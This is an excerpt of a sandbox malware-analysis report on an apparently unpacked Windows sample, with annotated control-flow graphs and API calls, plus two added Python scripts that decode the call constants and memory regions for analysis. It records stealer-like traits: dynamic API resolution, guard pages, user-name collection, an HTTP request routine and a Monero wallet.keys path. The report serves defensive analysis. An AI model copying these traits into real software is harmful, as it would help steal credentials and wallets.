                        • String ID: 0"$0R$8#$@$$NtQueryInformationProcess$PU$X!$X$$p$$x"$!$#$$
                        • API String ID: 2238633743-1988400604
                        • Opcode ID: 808b8a673339c1917b4c01dab5eea85af28f6ff09b3ffb7afc2900ff084b35b5
                        • Instruction ID: 8955939c6e5d3fb9ecb4ddbbcee93a2ea85a8a1c6ad71ce00c6cf2e9595cb741
                        • Opcode Fuzzy Hash: 808b8a673339c1917b4c01dab5eea85af28f6ff09b3ffb7afc2900ff084b35b5
                        • Instruction Fuzzy Hash: 08A17EB9500210AFD394EFA8FD88A667FF9F75E301704853EA609C3264D7399865CF1A

                        Control-flow Graph (basic blocks with their API calls, and edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                        • 764: 2645c0-264695, RtlAllocateHeap -> 781
                        • 781: 2646a0-2646a6 -> 782, 783
                        • 782: 26474f-2647a9, VirtualProtect
                        • 783: 2646ac-26474a -> 781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0026460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0026479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30): 002645C7, 002645D2, 002645DD, 002645E8, 002645F3, 00264617, 00264622, 0026462D, 00264638, 00264643, 00264657, 00264662, 0026466D, 00264678, 00264683, 002646AC, 002646B7, 002646C2, 002646CD, 002646D8, 00264713, 0026471E, 00264729, 00264734, 0026473F, 0026474F, 0026475A, 00264765, 00264770, 0026477B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one string repeated 30 times, once per xref in the Strings list above)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 1ad113b5d3ae6ca27866f82f268df141245929ffc5854594e0c247fe044f88a7
                        • Instruction ID: e4d338658deae3b4571e49b64587e27379e1cf6d64fb60d73fb8ffb9fb6d27fd
                        • Opcode Fuzzy Hash: 1ad113b5d3ae6ca27866f82f268df141245929ffc5854594e0c247fe044f88a7
                        • Instruction Fuzzy Hash: 7F413B347D37146BE626B7B4A8C1FAD765ADFC37C8F505044AA209A6C0CBB06560CFB2

                        Control-flow Graph (basic blocks with their calls, and edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                        • 801: 264880-264942, call 27a7a0, call 2647b0, call 27a740 * 5, InternetOpenA, StrCmpCA -> 816, 817
                        • 816: 264944 -> 817
                        • 817: 26494b-26494f -> 818, 819
                        • 818: 264955-264acd, call 278b60, call 27a920, call 27a8a0, call 27a800 * 2, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a920, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a920, call 27a8a0, call 27a800 * 2, InternetConnectA -> 819, 905
                        • 819: 264ecb-264ef3, InternetCloseHandle, call 27aad0, call 269ac0 -> 829, 830
                        • 829: 264ef5-264f2d, call 27a820, call 27a9b0, call 27a8a0, call 27a800 -> 830
                        • 830: 264f32-264fa2, call 278990 * 2, call 27a7a0, call 27a800 * 8
                        • 905: 264ad3-264ad7 -> 906, 907
                        • 906: 264ae5 -> 908
                        • 907: 264ad9-264ae3 -> 908
                        • 908: 264aef-264b22, HttpOpenRequestA -> 909, 910
                        • 909: 264ebe-264ec5, InternetCloseHandle -> 819
                        • 910: 264b28-264e28, call 27a9b0, call 27a8a0, call 27a800, call 27a920, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a920, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a920, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a9b0, call 27a8a0, call 27a800, call 27a920, call 27a8a0, call 27a800, call 27a740, call 27a920 * 2, call 27a8a0, call 27a800 * 2, call 27aad0, lstrlen, call 27aad0 * 2, lstrlen, call 27aad0, HttpSendRequestA -> 1021
                        • 1021: 264e32-264e5c, InternetReadFile -> 1022, 1023
                        • 1022: 264e67-264eb9, InternetCloseHandle, call 27a800 -> 909
                        • 1023: 264e5e-264e65 -> 1022, 1024
                        • 1024: 264e69-264ea7, call 27a9b0, call 27a8a0, call 27a800 -> 1021
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00264915
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 0026493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00264ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00280DDB,00000000,?,?,00000000,?,",00000000,?,00E2E948), ref: 00264DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00264E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00264E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00264E49
                        • InternetCloseHandle.WININET(00000000), ref: 00264EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00264EC5
                        • HttpOpenRequestA.WININET(00000000,00E2E9C8,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00264B15
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • InternetCloseHandle.WININET(00000000), ref: 00264ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------$H$h$x
                        • API String ID: 460715078-2324874663
                        • Opcode ID: 31a9b902f9882f182deeea2e426b75ae04ac6ff7b59394d0e326964bb521988b
                        • Instruction ID: 6e293426f0b3b865990d9c1d7409c3d92d54c11a648693ac3f1a2fa109019239
                        • Opcode Fuzzy Hash: 31a9b902f9882f182deeea2e426b75ae04ac6ff7b59394d0e326964bb521988b
                        • Instruction Fuzzy Hash: 3B122071921118AADB15FBA0DC92FEEB338BF55310F5081A9F11A62091DF702F69CF66
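Two of the entries above carry their security-relevant detail in raw argument values rather than in names: the 2645c0 function calls VirtualProtect with flNewProtect 00000100, which is PAGE_GUARD (the basis of the "create guard pages" signature in the overview; the 4-byte dwSize still guards the whole page), and references the same 166-character Opus Theatre string from 30 places, mostly 11 bytes apart, which is generated padding rather than real use of the string. The 264880 routine opens WinINet with dwAccessType 1 (INTERNET_OPEN_TYPE_DIRECT), connects with dwService 3 (INTERNET_SERVICE_HTTP), opens the request with dwFlags 00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE) and reads the response in 0x7CF-byte (1999-byte) chunks. The script below is an added example for this report, not Joe Sandbox code: it parses bullets in the report's own "APIs" and "Strings" format, decodes those constants from the documented Win32/WinINet values, and flags strings whose xref count and gap histogram point to padding. The sample lines are copied from the two entries; the 30 string bullets are rebuilt from their xref addresses.

```python
"""Decode the constant arguments in Joe Sandbox 'APIs' bullets and count how
often one string is referenced from a single function.

Added example for this report, not Joe Sandbox code.  Sample lines are copied
from the 2645c0 and 264880 entries above; the tables hold documented Win32 /
WinINet values and each decoded slot is that API's documented parameter index.
"""
import re
from collections import Counter, defaultdict

PAGE_FLAGS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
              0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
INTERNET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                  0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                  0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00000200: "INTERNET_FLAG_NO_UI",
                  0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}


def bitmask(value, table):
    """Name each set bit present in table (highest bit first); other bits stay hex."""
    names = [n for bit, n in sorted(table.items(), reverse=True) if value & bit]
    leftover = value & ~sum(table)
    return names + ([hex(leftover)] if leftover else [])


# API -> (argument index, parameter name, decoder), per the documented prototypes
ARG_DECODERS = {
    "VirtualProtect":   (2, "flNewProtect", lambda v: bitmask(v, PAGE_FLAGS)),
    "InternetOpenA":    (1, "dwAccessType", lambda v: INTERNET_OPEN_TYPE.get(v, hex(v))),
    "InternetConnectA": (5, "dwService", lambda v: INTERNET_SERVICE.get(v, hex(v))),
    "HttpOpenRequestA": (6, "dwFlags", lambda v: bitmask(v, INTERNET_FLAGS)),
    "InternetReadFile": (2, "dwNumberOfBytesToRead", lambda v: v),
}
API_RE = re.compile(r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]{8})")
XREF_RE = re.compile(r"•\s*(.*), xrefs: ([0-9A-Fa-f]{8})\s*$")


def parse_api_line(line):
    """One 'APIs' bullet -> dict.  '?' (argument not recovered by the sandbox)
    becomes None; 'Part of subcall function' bullets are flagged as nested."""
    m = API_RE.search(line)
    if not m:
        return None
    api, module, argstr, ref = m.groups()
    args = [None if a.strip() == "?" else a.strip() for a in argstr.split(",")]
    return {"api": api, "module": module, "args": args, "ref": ref.upper(),
            "nested": "Part of subcall function" in line}


def decode_call(call):
    """{parameter: symbolic value} for a known API's constant argument, else None."""
    spec = ARG_DECODERS.get(call["api"])
    if spec is None:
        return None
    idx, pname, decoder = spec
    raw = call["args"][idx] if idx < len(call["args"]) else None
    if raw is None:
        return {pname: None}
    try:
        return {pname: decoder(int(raw, 16))}
    except ValueError:                    # the sandbox printed a string, not a number
        return {pname: raw}


def decode_all(lines):
    """{'API@ref': decoded dict} for every bullet that has a decodable argument."""
    out = {}
    for line in lines:
        call = parse_api_line(line)
        decoded = decode_call(call) if call else None
        if decoded:
            out[f'{call["api"]}@{call["ref"]}'] = decoded
    return out


def string_xrefs(lines):
    """'Strings' bullets -> {string: sorted list of referencing addresses}."""
    refs = defaultdict(list)
    for line in lines:
        m = XREF_RE.search(line)
        if m:
            refs[m.group(1)].append(m.group(2).upper())
    return {s: sorted(r) for s, r in refs.items()}


def padding_candidates(xrefs, min_refs=10):
    """Strings referenced min_refs+ times by one function are rarely real use.
    The gap histogram between consecutive references is reported too: a single
    dominant gap means the references come from a repeated generated stub."""
    report = {}
    for s, refs in xrefs.items():
        if len(refs) >= min_refs:
            addrs = [int(r, 16) for r in refs]
            report[s] = {"count": len(refs),
                         "gaps": Counter(b - a for a, b in zip(addrs, addrs[1:]))}
    return report


# Sample input copied from the report entries above (2645c0 and 264880).
SAMPLE_API_LINES = [
    "• RtlAllocateHeap.NTDLL(00000000), ref: 0026460F",
    "• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0026479C",
    "• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00264915",
    "• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00264ABA",
    "• HttpOpenRequestA.WININET(00000000,00E2E9C8,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00264B15",
    "• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00264E49",
]
OPUS = ("The Opus Theatre was founded by British-Argentine composer and concert pianist "
        "Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.")
OPUS_XREFS = """002646CD 0026474F 00264622 00264734 002645C7 0026475A 002645F3 0026466D 002645E8 00264617
00264683 002646B7 00264657 002645D2 002645DD 00264713 00264765 00264770 00264662 00264638
002646AC 00264729 0026477B 0026471E 0026473F 0026462D 00264678 00264643 002646C2 002646D8""".split()
# The 30 'Strings' bullets of 2645c0, rebuilt from their xref addresses.
SAMPLE_STRING_LINES = [f"• {OPUS}, xrefs: {x}" for x in OPUS_XREFS]

if __name__ == "__main__":
    for key, val in decode_all(SAMPLE_API_LINES).items():
        print(key, val)
    for s, info in padding_candidates(string_xrefs(SAMPLE_STRING_LINES)).items():
        print(info["count"], "xrefs to", repr(s[:32] + "..."), "gaps:", dict(info["gaps"]))
```

Run against the two entries, the decoder reports PAGE_GUARD for the VirtualProtect call and KEEP_CONNECTION | PRAGMA_NOCACHE over an INTERNET_SERVICE_HTTP connection for the request, and the padding check finds 24 of the 29 gaps between the Opus Theatre references to be exactly 11 bytes. PAGE_GUARD is a modifier bit that Windows documents as combinable with a base protection; the sandbox prints only the value it saw, so the decoder reports the bit and nothing more.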
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002611B7), ref: 00277880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0027789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: a3001c3ad53fca1424b779f8ac1874f896108470b476c302ee88409e711ec5c7
                        • Instruction ID: 877097f12bb0ca3be1741556019d22b271e1f975a878f2916f731c0873dd6113
                        • Opcode Fuzzy Hash: a3001c3ad53fca1424b779f8ac1874f896108470b476c302ee88409e711ec5c7
                        • Instruction Fuzzy Hash: 4FF044B1944209ABC700DF94DD45FAEBFB8EB05711F100169F605A2680C7785514CBA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 7d2ea676da31b99aad6a23ae8c94ce215a84e79cc759bb19e1892ff243238128
                        • Instruction ID: 881a73e801ba07bf95a844fde3577ee845bcb7826e7049c187eb70d97535f4f5
                        • Opcode Fuzzy Hash: 7d2ea676da31b99aad6a23ae8c94ce215a84e79cc759bb19e1892ff243238128
                        • Instruction Fuzzy Hash: 6CD05E7890030CDBCB00DFE0D8496EEBB7CFB09311F0005A4D90562340EB30A8A1CAAA
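The resolver entry that follows (279c10) is the source of the "Extensive use of GetProcAddress" and "dynamically determine API calls" signatures: 43 GetProcAddress calls against one module handle (74DD0000), then LoadLibraryA * 8, then further GetProcAddress groups, each reached through a conditional block in the graph. Every lpProcName pointer the sandbox printed (00E15530, 00E29520, 00E2CE38, ...) lies above the highest base in the Memory Dump Source list (008E2000), so the names are not constants in the unpacked image but are built in memory the sandbox did not dump, which is why only pointers appear here. The script below is an added example for this report, not Joe Sandbox code: it parses the .sdmp names into a region map and checks every pointer in the resolver's bullets against it. Two readings of the report's own conventions are assumptions and are marked as such in the code: the fourth dotted field of an .sdmp name is taken as the region base and the fifth as the Win32 page protection (the values present, 00000004, 00000040 and 00000080, match PAGE_READWRITE, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY), and, since region sizes are not listed, a region is taken to end where the next one begins. The third value printed for each LoadLibraryA call (00275CA3) is stack content beyond the function's single parameter; it resolves into the 0x261000 execute-read-write region, consistent with a return address into the unpacked code, though the report does not label it.

```python
"""Map the API resolver's GetProcAddress / LoadLibraryA arguments onto the
memory regions the sandbox dumped.

Added example for this report, not Joe Sandbox code.  Assumptions (also marked
in comments): the .sdmp name fields are read as
pid.stage.dumpid.base.protect.x.type.index with field 4 the region base and
field 5 the Win32 page protection; region sizes are not listed, so a region is
taken to end where the next one begins.
"""
import re
from collections import defaultdict

PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
H8 = r"([0-9A-Fa-f]{8})"
SDMP_RE = re.compile(rf"{H8}\.{H8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{H8}\.{H8}\.{H8}\.{H8}\.sdmp")
CALL_RE = re.compile(rf"(GetProcAddress|LoadLibraryA)\.KERNEL32\(([^)]*)\), ref: {H8}")


def parse_regions(lines):
    """'Source File' / 'Associated' lines -> sorted unique [(base, protection)]."""
    regions = set()
    for line in lines:
        m = SDMP_RE.search(line)
        if m:
            base = int(m.group(4), 16)  # assumption: field 4 is the region base
            prot = int(m.group(5), 16)  # assumption: field 5 is the page protection
            regions.add((base, PAGE_PROTECT.get(prot, hex(prot))))
    return sorted(regions)


def locate(ptr, regions):
    """Dumped region containing ptr, or 'outside dumped image'.  A region ends
    where the next begins; the last region's size is unknown, so a pointer at
    or past its base is reported as outside (the conservative answer)."""
    for (base, prot), (next_base, _) in zip(regions, regions[1:]):
        if base <= ptr < next_base:
            return f"{base:08X} ({prot})"
    return "outside dumped image"


def parse_calls(lines):
    """GetProcAddress / LoadLibraryA bullets -> [(api, args as printed, ref)]."""
    calls = []
    for line in lines:
        m = CALL_RE.search(line)
        if m:
            calls.append((m.group(1), [a.strip() for a in m.group(2).split(",")],
                          m.group(3).upper()))
    return calls


def resolver_summary(call_lines, region_lines):
    """Group GetProcAddress calls by module handle and locate each lpProcName
    pointer.  For LoadLibraryA (one declared parameter) also locate the third
    printed value, which is stack content just above the argument."""
    regions = parse_regions(region_lines)
    by_module, loads = defaultdict(list), []
    for api, args, ref in parse_calls(call_lines):
        if api == "GetProcAddress":
            by_module[args[0]].append((args[1], locate(int(args[1], 16), regions)))
        else:
            stack = args[2] if len(args) > 2 and args[2] != "?" else None
            loads.append({"ref": ref, "name_ptr": locate(int(args[0], 16), regions),
                          "stack_value": stack and locate(int(stack, 16), regions)})
    return {"regions": regions, "by_module": dict(by_module), "loadlibrary": loads}


# Sample input copied from the report: the full region list of this dump and
# the first five GetProcAddress plus the three LoadLibraryA bullets of 279c10.
REGION_LINES = """
Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
""".strip().splitlines()
CALL_LINES = [
    "• GetProcAddress.KERNEL32(74DD0000,00E15530), ref: 00279C2D",
    "• GetProcAddress.KERNEL32(74DD0000,00E15410), ref: 00279C45",
    "• GetProcAddress.KERNEL32(74DD0000,00E29520), ref: 00279C5E",
    "• GetProcAddress.KERNEL32(74DD0000,00E29280), ref: 00279C76",
    "• GetProcAddress.KERNEL32(74DD0000,00E15890), ref: 0027A02B",
    "• LoadLibraryA.KERNEL32(00E2CDC0,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A03D",
    "• LoadLibraryA.KERNEL32(00E2CE80,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A04E",
    "• LoadLibraryA.KERNEL32(00E2CF28,?,00275CA3,00280AEB,?,?,?,?,?,?,?,?,?,?,00280AEA,00280AE3), ref: 0027A060",
]

if __name__ == "__main__":
    summary = resolver_summary(CALL_LINES, REGION_LINES)
    for hmod, names in summary["by_module"].items():
        print(f"module {hmod}: {len(names)} names resolved, first: {names[0]}")
    for load in summary["loadlibrary"]:
        print(load)
```

On this dump the region map has 15 entries, 12 of them PAGE_EXECUTE_READWRITE, which is the unpacked image with its section rights changed as the overview notes; every name pointer and every library-name pointer in the sample lands outside that map, while the stack value 00275CA3 lands in the 0x261000 code region. The same check applied to a hooked GetProcAddress would recover the names themselves; from the static listing alone it only tells you where to dump.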

                        Control-flow Graph (basic blocks with their API calls, and edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
                        • 633: 279c10-279c1a -> 634, 635
                        • 634: 27a036-27a0ca, LoadLibraryA * 8 -> 636, 637
                        • 635: 279c20-27a031, GetProcAddress * 43 -> 634
                        • 636: 27a146-27a14d -> 638, 639
                        • 637: 27a0cc-27a141, GetProcAddress * 5 -> 636
                        • 638: 27a216-27a21d -> 640, 641
                        • 639: 27a153-27a211, GetProcAddress * 8 -> 638
                        • 640: 27a21f-27a293, GetProcAddress * 5 -> 641
                        • 641: 27a298-27a29f -> 642, 643
                        • 642: 27a337-27a33e -> 644, 645
                        • 643: 27a2a5-27a332, GetProcAddress * 6 -> 642
                        • 644: 27a344-27a41a, GetProcAddress * 9 -> 645
                        • 645: 27a41f-27a426 -> 646, 647
                        • 646: 27a4a2-27a4a9 -> 648, 649
                        • 647: 27a428-27a49d, GetProcAddress * 5 -> 646
                        • 648: 27a4dc-27a4e3 -> 650, 651
                        • 649: 27a4ab-27a4d7, GetProcAddress * 2 -> 648
                        • 650: 27a515-27a51c -> 652, 653
